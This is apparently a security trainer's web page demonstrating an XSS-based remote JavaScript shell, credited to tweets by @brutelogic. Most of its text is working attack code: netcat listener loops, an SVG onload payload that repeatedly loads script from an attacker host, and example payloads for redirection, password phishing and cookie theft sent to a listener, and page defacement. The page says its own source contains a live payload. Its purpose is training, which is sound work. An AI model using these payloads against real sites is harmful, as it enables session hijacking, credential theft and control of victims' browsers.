So this is kinda fun. With this page open, copy and paste one of the listener commands from below into a terminal window on your local machine. Then, paste alert(42) into the resulting shell and press "Enter". Once you recover from the initial shock of what you just witnessed, play with the following payloads and spend the next hour of life thoroughly enjoying yourself.
Listeners
Linux
while :; do printf "j$ "; read c; printf "HTTP/1.1 200 OK\n\n$c" | nc -lp 8000 >/dev/null; done
OS X
while :; do printf "j$ "; read c; printf "HTTP/1.1 200 OK\n\n$c" | nc -l 8000 >/dev/null; done
Example Payloads
Redirection
window.location = 'https://www.practisec.com/training/'
Phishing
i=new Image();i.src="http://127.0.0.1:8888/pw/"+prompt("Password:")
- Requires a second listener, e.g.
python -m "SimpleHTTPServer" 8888.
Session Hijacking
i=new Image();i.src="http://127.0.0.1:8888/pw/"+document.cookie
- Requires a second listener, e.g.
python -m "SimpleHTTPServer" 8888.
Defacement
d=document;e=d.createElement("p");e.innerHTML="lanmaster53 wuz here!";d.body.appendChild(e)
Credits
This is all based on the code shared in the following tweets.
XSShell - Target
<svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//HOST:PORT";d.body.appendChild(z)},0)>
— Brute (@brutelogic) September 2, 2015XSShell - Attacker
$ while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done
— Brute (@brutelogic) September 2, 2015Check the source code here ^^^ for the active payload.
Please share your thoughts, comments, and suggestions via Twitter.
Tweet Follow @lanmaster53